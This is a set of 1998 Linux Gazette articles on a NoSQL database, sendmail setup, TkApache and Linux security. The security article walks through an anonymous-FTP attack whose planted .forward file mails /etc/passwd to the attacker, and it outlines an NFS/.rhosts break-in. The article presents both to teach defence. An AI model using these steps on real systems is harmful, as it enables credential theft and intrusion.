fourth generation language most appropriate to the UNIX
environment.

The complete article is well worth reading for anyone who has ever wondered just why Linux software is different than that used with mainstream operating systems, and why GUI software has only recently begun to become common.

NoSQL incorporates the ideas presented above. A major difference between Walter W. Hobbs' RDB database and NoSQL is that NoSQL uses awk extensively to perform tasks handled by perl in RDB. Awk is a more specialized tool with a much smaller memory footprint, and since the data-pipelining which is the essence of these relational database management systems requires repeated invocation of their respective interpreters, NoSQL exerts less of a strain on a system's resources, especially important in a multi-user environment.

After installing the package (no compilation is involved) a new subdirectory under /usr/local/lib called nosql will be created and populated; it will have these subdirectories:

awk
contains several awk scripts which are responsible for most of the table-manipulation jobs

doc
contains both Postscript and HTML versions of the readable and complete NoSQL documentation, as well as a Postscript version of the Schaffer and Wolf article from the Unix Review

mylib
an empty directory for new scripts and programs

perl
perl scripts which perform other NoSQL functions

sh
shell scripts which act as wrappers for the awk and perl scripts.

The entire subdirectory occupies just under 600 kb., most of which is documentation.

After installing the files, the only other step needed before trying out the database is setting three environment variables. Here are three lines from my .zshenv file (bash users should have these lines in the .bash_profile file):


export NSQLIB=/usr/local/lib/nosql
export NSQSH=/bin/ash
export NSQAWK=/usr/bin/mawk

Carlo Strozzi recommends using ash rather than one of the larger and more powerful shells such as bash or zsh; ash uses less memory, and since the shell is repeatedly invoked while using NoSQL, the upshot will be a noticeable increase in speed and a reduction in memory requirements.

Since there is no compiled code in the package, NoSQL should run on any machines which have awk and perl available; in other words the database isn't Linux-centric. The ASCII format of the data tables is also very portable, and can be manipulated by text editors and common filesystem tools. Data can be extracted from tables by means of various "operators" via input-output redirection (e.g., pipes, STDIN and STDOUT). The only limits on the amount of data which can be handled are in the machine running NoSQL; the installed memory and processor speed are the limiting factors.

As the name implies this is not an SQL database, which should make NoSQL more accessible to users lacking SQL expertise. I don't know SQL at all and I found the basic commands of NoSQL easy to learn. All commands are executed as parameters of the nosql shell script. Here's an example NoSQL table:


Name       Freq        Height      Season
----       ----        ------      ------
laccaria   27          6           Fall
lepiota    5           8           Summer
amanita    42          7           Summer
lentinus   85          5           Spring-Fall
morchella  45          6           Spring
boletus    65          5           Summer
russula    75          4           Summer

Single tabs must separate the fields from each other; even the gaps between the groups of dashes on the dashed separator line must be single tabs. An alternate format for the tabular data is the list; the above table can be converted to this format with the command

nosql tabletolist < [filename]

The results look like this:



Name    laccaria
Freq    27
Height  6
Season  Fall

Name    lepiota
Freq    5
Height  8
Season  Summer

Name    amanita
Freq    42
Height  7
Season  Summer

Name    lentinus
Freq    85
Height  5
Season  Spring-Fall

Name    morchella
Freq    45
Height  6
Season  Spring

Name    boletus
Freq    65
Height  5
Season  Summer

Name    russula
Freq    75
Height  4
Season  Summer

If the above table were named pilze.rdb, either the command

nosql istable < pilze.rdb

or

nosql islist < pilze.rdb

would ask nosql to check the table or list format's validity, depending on which format is being checked. Another command,

nosql edit < pilze.rdb

will open the file in the editor defined by the EDITOR environment variable (often set to vi by default). A file in table format is automatically converted into the vertical list format for easier editing, then changed back into a table when exiting the editor. When the file is saved or closed NoSQL will automatically check the validity of the format and give the line numbers where any errors occur. This seemingly obsessive concern with correct format isn't mere pedantry; the various NoSQL operators which manipulate and extract data need to be able to quickly distinguish headers from data and data-fields from each other, and single tabs are the criteria.

There are over forty operator functions available, some of which extract or rearrange fields while others are used to generate reports. Their names are more-or-less mnemonic, such as inscol and addcol, which are used to insert a column into a table, respectively on the left- or right-hand side. Other operators index and search tables. Examples of typical usage (i.e., connecting NoSQL commands with pipes) are included in the documentation.
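
As a small illustration of the pipeline philosophy, using only commands shown above plus standard grep, and the pilze.rdb table as data (the gap in the grep pattern is a single tab):

nosql tabletolist < pilze.rdb | grep -B3 'Season	Summer'

This converts the table to list format and prints every record whose Season field is Summer; the -B3 option makes grep show the three lines preceding each match, which are the rest of that record.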

As with any Open-Source software, it's hard to tell how many people or organizations are using it. In an e-mail, I asked Carlo Strozzi for examples of real-world usage of NoSQL; he replied that he has been using it quite a bit for database-backed CGI scripts for the WWW. He also stated that several companies in Italy are using it internally. Carlo Strozzi works for IBM in Italy, and he has developed several web applications backed by NoSQL; three of the publicly accessible pages are:

Fortune companies and people profiles

Classifieds - this is in Italian

Car classifieds, in Italian

The latest version of NoSQL can be obtained from this FTP site.


Last modified: Thu 29 Oct 1998


Copyright © 1998, Larry Ayers
Published in Issue 34 of Linux Gazette, November 1998




"Linux Gazette...making Linux just a little more fun!"


Updates and Corrections

By


Introduction

I've accumulated a few updates to past articles and reviews, presented here in reverse chronological order. By the way, I appreciate the e-mail I receive from LG readers; keep it coming!


The Keyboard Practicer

Last month, in the second of two articles about typing tutor programs I included the Tcl source for a program by Satoshi Asami called Keyboard Practicer. It turns out that the version I had didn't include the licensing information, which follows:


/*-
 * Copyright (c) 1991-1998 Satoshi Asami
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 *    notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 *    notice, this list of conditions and the following disclaimer in the
 *    documentation and/or other materials provided with the distribution.
 *

* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS
* IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE
* AUTHOR OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
* WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
* NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
* THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 */

The updated archive (which doesn't include any changes other than the inclusion of the above license) is available from this FTP site.


Typist

A couple of issues ago I wrote about a console keyboard tutor called Typist, which at that time was in Sunsite's /pub/Linux/Incoming directory. I've received e-mail inquiries as to its current location, which isn't obvious. The new location is here.


TkDesk

After a long hiatus, Christian Bolik has released a new version of his featureful file-and-desktop manager TkDesk. I reviewed a much earlier release back in 1996 (LG #8), and in the several releases since then the application has improved and matured. Another factor which has changed since 1996 is the typical desktop machine running TkDesk. The application felt a trifle sluggish on my old, low-memory 486, but on a reasonably recent Pentium-based system TkDesk runs well. Aside from being a versatile and configurable file-manager, TkDesk occupies a sort of middle ground between the typical miscellaneous collection of Linux apps and a full-fledged desktop manager such as KDE or Gnome. Its integration with Netscape and XEmacs is particularly useful, and the button-bar is one of the most configurable and useful I've seen for X-Windows.

TkDesk still won't run with Tcl/Tk 8.0, but now that incrTcl (the C++ object-oriented extension to Tcl) has been updated to work with the newer Tcl/Tk releases, the release of a version of TkDesk which uses these libraries can't be too far off. The new 1.1 release of TkDesk works fine with Tcl7.6/Tk4.2 for the time being. The TkDesk homepage is here.


Window Managers

Two of the most promising new window-managers available for X have been undergoing rapid development lately. Marco Macek's Icewm is getting better with each release, and the recent betas have been including GNOME-specific features. This won't affect those users who aren't using GNOME, as the configure script detects a GNOME installation and disables these features if GNOME isn't installed. Check out the icewm home-page for the latest news.

Brad Hughes has been working hard to squelch bugs and further refine his Blackbox window-manager. He has successfully converted Blackbox so that it uses the GNU autoconf system instead of an Imakefile type of configuration; in other words it now uses a configure script to generate a custom-tailored makefile, which in some cases will make Blackbox easier to compile.

The Blackbox home-page is here.


Last modified: Wed 28 Oct 1998


Copyright © 1998, Larry Ayers
Published in Issue 34 of Linux Gazette, November 1998




"Linux Gazette...making Linux just a little more fun!"


Securing Your Linux Box

By


With Linux becoming widespread in the work environment, the security of the individual machines must be considered. Machines running Linux can be networked easily, creating the potential risk of unauthorized users gaining access. This is particularly true if your Linux installation is straight out of the box. I will give a brief introduction to securing your Linux box and making your network environment a safer place for both your data and the people who use it.

``You are only as strong as the weakest link in your defense,'' says the Chinese proverb, and this is certainly true in the field of computer security. If you forget to patch that newly downloaded version of lpd all your walls can come crumbling down, even with the securest system in the world. Always be cautious when installing any new software. If you are using Linux only as a desktop machine at home and you connect to the Internet via a modem, you do not have to worry so much. On the other hand, if you are running a mission-critical server wired into the Net, I would strongly advise checking out the security history of any piece of software that you wish to install (remembering that famous version of Sendmail).

Several mailing lists and many web pages offer extensive help on Linux security. The information is out there, you just need to go and harvest it. If you don't have the time, patience or know-how, contact a security consultant to take a look at your system setup and discover any potential weak spots. Usually security consultant firms have their own Tiger Teams who, for a fee, will attempt to make the walls crumble around your computer(s). Their object is to get into your system within a certain period of time, and some even refund your money if they are unsuccessful. Tiger Teams are a valuable asset to security-conscious companies. Since Tiger Teams cost quite a bit, I would suggest you break into your own machines. This exercise can save you money, and give you a better understanding of the structure and different abstract layers of Linux in the process.

The starting point of our Linux security tour is the password. Many people keep their entire life on a computer and the only thing preventing others from seeing it is the eight-character string called a password. Not something one would call completely reliable. Contrary to popular belief, an uncrackable password does not exist. Given time and resources all passwords can be guessed either by social engineering or by brute force.

Since password cracking can be a time- and resource-consuming art, make it hard for any cracker who has grabbed your password file. Running a password cracker on a weekly basis on your system is a good idea. This helps to find and replace passwords that are easily guessed or weak. Also, a password checking mechanism should be present to reject a weak password when first choosing a password or changing an old one. Character strings that are plain dictionary words, or are all in the same case, or do not contain numbers or special characters should not be accepted as a new password.

A safe password can be constructed by taking the first letter of your favorite phrase, quote or sentence and adding special characters. For example, suppose my favorite phrase is ``the quick brown fox jumped over the lazy dog''; taking the first letter of every word, I end up with tqbfjotld. Next, I add special characters and perhaps squeeze in the year, resulting in a password of 9tqbf!jotld8. This is much more secure than the name of your spouse or child.

Word lists containing hundreds (if not thousands) of words that can be fed to a password cracker are available on the Internet. Some contain only names, so cracking the password ``maggie'' is quite trivial, while the likelihood of 9tqbf!jotld8 appearing in one of those lists is quite slim. However, even though our proposed password is not likely to appear in a word list, more advanced cracker programs come with a feature called Incremental Cracking Mode, which means that every possible permutation is tried. The user gives it the minimum and maximum number of letters in a password, upper case or lower case, inclusion of special characters and numbers, and the password cracker does the rest. Granted, it could take a lot of time and resources, but it is possible.

Next, be aware of the services running on your system. Most distributions of Linux have HTTP, FTP, SMB, Sendmail and various other services running by default. Not everyone needs a web server running, so why not get rid of it--it takes up resources and can be a potential security risk. To terminate web services, type:


kill -9 <PID>

To find out the process ID(s) of a certain daemon or service, type:

ps aux | grep <daemon name>

Also, comment these daemons out of your start-up scripts so that they will not restart after a reboot. Unused services can let others gain information about your system and can also pose a security risk.
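
For example, to be rid of a web server left running by default (the PID of 153 is made up; use whatever the second column of your own ps output shows):

ps aux | grep httpd
kill -9 153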

Another thing to avoid is the use of .rhosts files, as they are a favorite of crackers. A .rhosts file in a user's home directory lists remote systems that are trusted. When you use rlogin or rsh to connect from one of those systems, the target machine checks its .rhosts files and, if your machine name is found, gives you access without the need for a password.

For more information about the .rhosts file, look in your favorite Linux or System Administration manual. One of the most famous exploits involving the .rhosts file is the misconfiguration of the Network File System (NFS). First the hacker checks whether your machines export any file systems (to check, type: showmount -e), and whether any are world-writable. Next he remotely mounts your file system and places an .rhosts file into a user's directory. Last, the hacker uses rlogin to log into your machine as that user, and your system is now compromised. The moral of this story: leave the configuration of the nfsd to someone who is more experienced than you, or read the documentation carefully.

Another similar hack involves the misconfiguration of a popular service commonly found on the Internet; anonymous FTP. The first, and obvious method, of gaining unauthorized access via anonymous FTP is by letting the public have access to your password file. Granted all passwords are stored in encrypted form, but remember we've already shown crackers can get by this. Another way to gain access to the local password file is by exploiting the writeability of the /ftp directory. Look at these simple steps:

  1. Create a fake .forward file that has the following command in it:

        |/bin/mail [email protected] < /etc/passwd
  2. Connect to the victim machine via FTP and log in as user FTP.
  3. Enter any password you wish.
  4. Upload the .forward file you have created in Step 1.
  5. Log out and send mail to [email protected].
  6. Sit back as victim.machine.com e-mails you a copy of its local password file.
Clearly, an easy way to get a password file. The heart of this hack lies in a simple mistake made by the system administrator; so, never make the /ftp directory writable by user anonymous. Setting up an anonymous FTP server is an art of its own, but careful attention to ownership and permissions on the FTP area will head off most of the trouble; a quick check is shown below.
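
A quick check with standard ls, assuming your anonymous FTP area lives in the usual ~ftp:

ls -ld ~ftp

The permissions shown should not include write access for the ftp user, group or other.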

One last thing to remember is that the system logs are your friends. The logs are the only way to find out what is/has/will be happening on your system, so keep reading them. Also, make sure that they are not being tampered with by intruders or by fellow system administrators.

As Linux finds its way into more and more corporate environments, it is a crucial step to keep users out of each other's files and patch all the holes that might be utilized by hackers. With the notion of interconnectivity, industrial espionage will also be on the rise. With simple preventative measures and user education, the workplace can be a safe place for your secrets.


Copyright © 1998, Peter Vertes
Published in Issue 34 of Linux Gazette, November 1998




"Linux Gazette...making Linux just a little more fun!"


Sendmail Made Easy!

By


All Linux distributions come with a Mail Transfer Agent (the program that does the routing and sending of the messages). The daddy of them all is sendmail (http://www.sendmail.org/).

sendmail is usually preconfigured, but if you need to set up a special situation (for example UUCP), it can become quite a nuisance. The reason for this is that at the initial writing of sendmail the configuration language was designed to parse quickly at the expense of being cryptic. I looked at a sendmail.cf in 1987 and didn't look again for 10 years.

smail is easier to understand and has always had the nice feature of batching messages, running the batches through gzip and sending the jobs off via UUCP. Saved me quite a lot of money in phone bills over the years.

However, a year and a half ago I found a package called BSMTP (Batched Simple Mail Transport Protocol) for taking care of the batch-gzipping stuff. BSMTP is a package which is used with UUCP. sendmail uses the SMTP protocol when sending or receiving mail via TCP/IP, but you can also feed mail into sendmail directly using this protocol. Now this package will take outgoing mail, put many messages in batches with SMTP commands inserted between messages, gzip the batches and hand them to UUCP for transport. On the other end the process is reversed: uucp receives, hands to an uncompressor which feeds to sendmail. This results in a compression of better than half. Using advanced features of the uucp on Linux you can achieve very high throughputs. BSMTP works with both smail and sendmail and has a macro package which makes sendmail configuration much easier. I like to tinker so I tried it. It took about a weekend to get sendmail working with BSMTP/UUCP. Once I had figured out the basics, it became much easier; I only needed about an hour to set it up for my leased line.

Since you have Linux, you already have all the tools required. If not, install them from your distribution. I'll assume you have a working DNS with MX entries for your system and are connected by a leased line. Install the latest sendmail and sendmail-cf RPMs; the latter puts the configuration macros in the /usr/lib/sendmail-cf directory.
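
For example (the version numbers are illustrative; use whatever your distribution currently ships):


rpm -Uvh sendmail-8.9.1-1.i386.rpm sendmail-cf-8.9.1-1.i386.rpm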

Consider the following few lines in a file called linux.mc located in /usr/lib/sendmail-cf/cf:


divert(-1)
OSTYPE(linux)
FEATURE(use_cw_file)
define(`confCW_FILE', `-o /etc/sendmail/sendmail.cw')
FEATURE(mailertable,`hash -o /etc/sendmail/mailertable.db')
FEATURE(local_procmail)
define(`STATUS_FILE',`/etc/sendmail/sendmail.st')
MAILER(procmail)
MAILER(smtp)
It's rather cryptic--or is it?

Run this file through the m4 command by typing:


m4 ../m4/cf.m4 linux.mc > sendmail.cf
It produces a sendmail.cf of approximately 1200 lines (still unreadable to me) which has been in production use on my system.

Now let's have a look at what those lines mean.


divert(-1)
This line is a directive to the m4 macro processor which I had never bothered to understand; it diverts m4's output to nowhere, so that stray text and newlines ahead of the real configuration don't end up in the generated file.


OSTYPE(linux)
Now, that's fairly easy, right? Well, what it doesn't tell you is that the local delivery program mail.local from the sendmail distribution needs to be in /bin or your mail will disappear without a trace.


FEATURE(use_cw_file)
define(`confCW_FILE', `-o /etc/sendmail/sendmail.cw')
What on earth is a CW file?

I receive a lot of mail addressed to [email protected]; however, the host name is linux.lisse.na. No problem, we have an appropriate MX entry pointing lisse.na to linux.lisse.na, right? Wrong. You must tell sendmail the names under which it can receive mail on the local host. For example:


lisse
lisse.na
linux
linux.lisse.na
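
Once sendmail is running with the new configuration, you can verify which names it accepted by dumping class w in address-test mode (a quick check, assuming sendmail 8.x):


# Print the contents of class w (the names read from sendmail.cw):
echo '$=w' | sendmail -bt
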
If you overlook this, sendmail sends an error message which is somewhat misleading. The bounced message has the following Subject: line:
 
Subject: Returned mail: Local configuration error
The MX list line is the confusing part:
 
   ----- Transcript of session follows -----
554 MX list for nws.com.na. points back to linux.lisse.na
554 [email protected]... Local configuration error


FEATURE(mailertable,`hash -o /etc/sendmail/mailertable.db')
This line is only required if you have special delivery situations. For example, to use the BSMTP package to deliver mail for Triple A, Inc. via the UUCP neighbour bbbbb, set up an MX entry in the DNS and write something like this in the mailertable file:


.aaa.com.na     bsmtp:bbbbb
aaa.com.na      bsmtp:bbbbb
The two fields are separated by a TAB character, and you must run a program from the sendmail package called makemap on the mailertable file to produce the binary database file mailertable.db. For example:


makemap hash mailertable < mailertable
There are other database systems (for example, dbm) but let's not complicate matters.


FEATURE(local_procmail)
This line redefines the local mailer to be procmail. You most definitely want that.


define(`STATUS_FILE',`/etc/sendmail/sendmail.st')
This line defines the status file, in which sendmail records delivery statistics. Make sure you have created the /etc/sendmail directory as root.
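
Assuming the paths used above, as root:


mkdir -p /etc/sendmail
touch /etc/sendmail/sendmail.st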


MAILER(procmail)
procmail was written by Stephen R. van den Berg at my alma mater and deserves an article of its own. In short, it is the local delivery program. Its strength lies in its message-filtering capabilities -- very nice for those mailing lists.


MAILER(smtp)
Please note that I have left out the bsmtp entry that would be required if you had used a BSMTP entry in the mailertable. If you had a UUCP neighbour, you would also need a uucp mailer entry, which must come after smtp.
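
With a UUCP neighbour, the mailer section would end like this (a sketch assuming the stock uucp mailer; a bsmtp mailer definition would come from the BSMTP package):


MAILER(procmail)
MAILER(smtp)
MAILER(uucp)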

Now test this configuration file (a quick method is sketched below), copy it to the /etc directory after making a backup copy of the old one, and restart sendmail. As root, I use the command:


killall -HUP sendmail
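
A convenient way to test the new file before installing it is sendmail's address-test mode; the test address here is illustrative:


# Run address-test mode against the freshly generated file:
sendmail -bt -C./sendmail.cf
# At the ">" prompt, resolve an address through rulesets 3 and 0:
#   3,0 user@lisse.na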
I did not show you how to set up sendmail for UUCP, BSMTP, anti-SPAM or virtual domains. However, now that you have mastered the basics, it will be fairly easy.


Copyright © 1998, Eberhard W. Lisse
Published in Issue 34 of Linux Gazette, November 1998




"Linux Gazette...making Linux just a little more fun!"


TkApache

By Michael Holve


I've been using the Apache Web server for several years now, both to serve my own Web site and commercial sites. In all this time, this small, fast server has never failed me. While I'm perfectly happy with command-line tools, being a UNIX freak and all, let's face it: this is a Windows-mentality world. People like GUI interaction with their programs. The lack of a GUI has been a long-standing complaint about the Apache Web server.

There are currently several projects on the Internet to provide such a front-end for Apache. Why write another, you ask? Most of the projects currently available lack an easy-to-use layout, fail to support all of Apache's features in an open, modular way, or both. My vision is to create a tool that runs on many platforms with as little fuss on the part of the user as possible, and that has great growth potential.

Version 1.0 launched the afternoon of October 16th, 1998. Within the first 24 hours, it was downloaded 1,036 times and the TkApache Web page had 1,400 visitors. Not staggering numbers, but since then it's been downloaded somewhere around 150 times per day. This version was originally going to have some additional features, but the other developer, Lance Dillon, and I decided to concentrate on finishing the core features and doing some quick bug testing to get it released in time for ApacheCon in San Francisco that week. That, and the e-mails of the "where can I get it?!" variety streaming in at a rate of 30 or so a day...

Other neat features include callouts to Netscape to view the HTML documentation (future versions will sport context-sensitive, internal and browser-independent help), a setup/install window and a tail window. The tail window works like the UNIX "tail -f" command, letting you watch your log files in real time. TkApache allows you to monitor both your access and error logs.
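
For readers who haven't met it, the idiom the tail window reproduces is simply this (the log location is assumed; yours may differ):


tail -f /usr/local/apache/logs/access_log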

So where is TkApache headed? Our next goal is version 2.0, with maintenance releases along the way to fix bugs as we discover them. There are some lofty goals for this next version, some of which can already be seen in the code of the initial release. Chief among them is support for modules: we have envisioned an interface that can load user-submitted or internally developed modules to support the vast number of Apache modules and add-ons like SSL, PHP and mod_perl, among others. Also planned are performance graphing of CPU/RAM load, number of processes, Web site visitors, etc., as well as virtual host support. The user interface will evolve along with it to handle the load of information that must be dealt with -- information that formerly took up three rather good-sized configuration files. GUI design is a lot of fun for me, and something of an obsession: it's got to look good and be usable, or else it's just in the way.

What makes it tick, and how does all this relate to Perl? TkApache is written entirely in a combination of Perl and the Tk toolkit, known as PerlTk. Originally I started with Tcl/Tk and Perl, but it was a total hack. While I loved working with the Tk toolkit, I wasn't too familiar with, or interested in, Tcl. Perl was more my speed, and when I became aware of the PerlTk module, it was a perfect match for rapid prototyping. The GUI design is really fun to work on -- frustrating at times, but really quite easy. The whole solution lets all of Perl's wonderful text handling be used on the text in the configuration files. Weighing in at over 8,000 lines of code, TkApache is very portable (a few current items that make it less than optimal will be addressed in a maintenance release) and should run on Macintosh or Windows, as well as any UNIX platform, without modification. We're trying to keep the module count down to make it easier for potential users to get up and running, although we do currently rely on Data::Dumper and some File::Copy routines (all part of 5.005+).

Do stop by the TkApache Web site and see what you think. If you're familiar with Perl and/or Tk and would like to contribute to the project, you're very welcome to. We're also happy to receive feedback. There are screenshots and documentation available online.

Michael Holve [email protected]

TkApache Web Site: http://eunuchs.org/linux/TkApache/index.html


Copyright © 1998, Michael Holve
Published in Issue 34 of Linux Gazette, November 1998




Linux Gazette Back Page

Copyright © 1998 Specialized Systems Consultants, Inc.
For information regarding copying and distribution of this material see the Copying License.


Contents:


About This Month's Authors


Steve Adler

Steve was born in Mexico City and received his education in the U.S. He has a Ph.D. in Physics from the State University of New York. His first job was with a medical imaging group at the University of Texas medical school, writing software in the development effort to build a positron emission tomography camera. Since 1995 he has been a staff scientist in the physics department at Brookhaven National Laboratory. He is currently moving out of high energy physics into nuclear physics by joining the PHENIX experiment at the Relativistic Heavy Ion Collider, where he'll be working on the data acquisition system. Besides physics and computing, he enjoys roller blading, cycling, camping and travel.

Paul Anderson

Paul is primarily a computer hobbyist, working on the FreeWorld BBS software (http://www.freeworldbbs.org) for Linux in his off-time and setting up networks, with some system administration, for a web-hosting service.

Larry Ayers

Larry lives on a small farm in northern Missouri, where he is currently engaged in building a timber-frame house for his family. He operates a portable band-saw mill, does general woodworking, plays the fiddle and searches for rare prairie plants, as well as growing shiitake mushrooms. He is also struggling with configuring a Usenet news server for his local ISP.

Bill Bennet

Bill, the ComputerHelperGuy, lives in Selkirk, Manitoba, Canada; the "Catfish Capital of North America", if not the world. He is on the Internet at www.chguy.net. He tells us "I have been a PC user since 1983 when I got my start as a Radio Shack manager. After five years in the trenches, I went into business for myself. Now happily divorced from reality, I live next to my Linux box and sell and support GPL distributions of all major Linux flavours. I was a beta tester for the PC version of Playmaker Football and I play `pentium-required' games on the i486. I want to help Linux become a great success in the gaming world, since that will be how Linux will take over the desktop from DOS." It is hard to believe that his five years of university were only good for fostering creative writing skills.

Howard Cokl

Howard is a PC Technician and ad-hoc UNIX Administrator. He has used Linux in a number of different applications including ISP, DHCP, etc. He is working on building a Beowulf style computer. He implemented this CD-ROM server and can be reached at [email protected].

Jim Dennis

Jim is the proprietor of Starshine Technical Services. His professional experience includes work in the technical support, quality assurance, and information services (MIS) departments of software companies like Quarterdeck, Symantec/Peter Norton Group, and McAfee Associates, as well as field service positions with smaller VARs. He's been using Linux since version 0.99p10 and is an active participant on an ever-changing list of mailing lists and newsgroups. He's just started collaborating on the second edition of a book on UNIX systems administration. Jim is an avid science fiction fan and was married at the World Science Fiction Convention in Anaheim.

Scott Field

Scott has been programming and administering mainframes and PCs for 15 years professionally. He has used C++ for about 5 years, and did COBOL prior to that. He is currently working as a C++ contractor in Sydney. Outside work he enjoys spending time with his wife and three year old daughter. He is now looking for an STL algorithm that likes renovating houses.

Michael J. Hammel

A Computer Science graduate of Texas Tech University, Michael J. Hammel, [email protected], is a software developer specializing in X/Motif, living in Dallas, Texas (but calling Boulder, CO home for some reason). His background includes everything from data communications to GUI development to interactive cable systems, all based in UNIX. He has worked for companies such as Nortel, Dell Computer, and Xi Graphics. Michael writes the monthly Graphics Muse column in the Linux Gazette, maintains the Graphics Muse Web site and the Linux Graphics mini-HOWTO, helps administer the Internet Ray Tracing Competition (http://irtc.org) and recently completed work on his new book "The Artist's Guide to the Gimp", published by SSC, Inc. His outside interests include running, basketball, Thai food, gardening, and dogs.

Michael Holve

Michael has been working with Linux for about five years now and works for Cablevision Systems in New York as a Web/Tech Administrator. In his spare time (ha!) he works on Everything Linux, a premiere Linux site on the Internet (http://eunuchs.org/linux/index.html), writes software, hacks until 3am and enjoys creating all manners of computer graphics.

Manuel Arturo Izquierdo

Manuel is an archaeologist who graduated from the Universidad Nacional de Colombia. He currently works at the National Astronomical Observatory at the same university, where he has two research fields: archaeoastronomy and digital astronomical image processing. He has been a Linux fan for three years, using it for software development with the Tcl/Tk package and, more recently, the GTK toolkit. The Observatory's network runs only two platforms: Linux and Macintosh. The Observatory is very interested in promoting the use of Linux on campus.

Ron Jachim

Ron is Manager of Systems for the Barbara Ann Karmanos Cancer Institute, where he is responsible for the systems half of the Information Systems Group. He has fourteen years of networking experience and both a BA and an MS in Computer Science. His thesis was on fuzzy queries. He can be reached at [email protected].

Ron Jenkins

Ron has over 20 years experience in RF design, satellite systems, and UNIX/NT administration. He currently resides in Central Missouri where he will be spending the next 6 to 8 months recovering from knee surgery and looking for some telecommuting work. Ron is married and has two stepchildren.

Eberhard Lisse

Dr. Lisse is a Senior Medical Officer at the Swakopmund State Hospital on the Namibian coast. He is the founding Vice Chairman of the Namibian Internet Development Foundation (NAMIDEF), which connected Namibia to the Internet in 1994 (using Linux), and the country's top-level domain administrator for .NA. He has been using Linux exclusively since 0.99.something. He is married to Martha and has two children, who prefer their mother's Mac LCIII to Linux (even with KDE).

Mike List

Mike is a father of four teenagers, a musician, and a recently reformed technophobe who has been into computers since April 1996 and Linux since July 1997.

Kevin O'Malley

Kevin is currently working at the University of Michigan Artificial Intelligence Laboratory as a System Research Programmer. He specializes in network programming and network security. His background includes GUI development, embedded systems development for medical products and programming visualization tools for vehicle simulations. He is currently working on the Michigan Adaptive Resource eXchange project (MARX), a dynamic computational market designed to enable adaptive allocation of resources in large-scale distributed information systems. The project is part of DARPA/ITO's Information Survivability Program. He is co-author of the paper "An API for Internet Auctions" appearing in the September 1998 issue of Dr. Dobb's Journal.

Dean Staff

Dean is a computer technician for Inly Systems and a member of OCLUG. When not at work, Dean enjoys spending time with his wife and two daughters and playing with his aquarium.

Peter Vertes

Peter has a degree in Computer Security from the University of Massachusetts at Amherst and currently is employed at BigFoot Partners in New York City.

Dan York

Dan York is a technical instructor and the training manager for a technology training company located in central New Hampshire. He has been working with the Internet and UNIX systems for 13 years. While his passion is Linux, he has also spent the past two-and-a-half years working with Windows NT. He is both a Microsoft Certified Systems Engineer and a Microsoft Certified Trainer and has written a book for QUE on one of the MCSE certification exams.


Not Linux


Thanks to all our authors, not just the ones above, but also those who wrote giving us their tips and tricks and making suggestions. Thanks also to our new mirror sites. Thanks also to Ellen Dahl and Amy Kukuk for their help with News Bytes.

PBS has been showing a mystery series called "Jonathan Creek" that I have been enjoying quite a bit. The show can be quite intellectually challenging, as each mystery is of the "locked room" variety. No car chases, no sirens, no explosions -- just a dead body in a locked room with all the accompanying questions. Quite a lot of fun, actually.

I've never been quite sure why the makers of American TV shows assume their audience doesn't want to use its brains, or doesn't know how.

Another interesting difference between American and British entertainment is the actors. The British don't require that everyone be uniformly beautiful. It's quite refreshing to see a show where the stars look like you and your neighbors rather than high-fashion models or movie stars.

Have fun!


Marjorie L. Richardson
Editor, Linux Gazette,




Linux Gazette Issue 34, November 1998, http://www.linuxgazette.com
This page written and maintained by the Editor of Linux Gazette,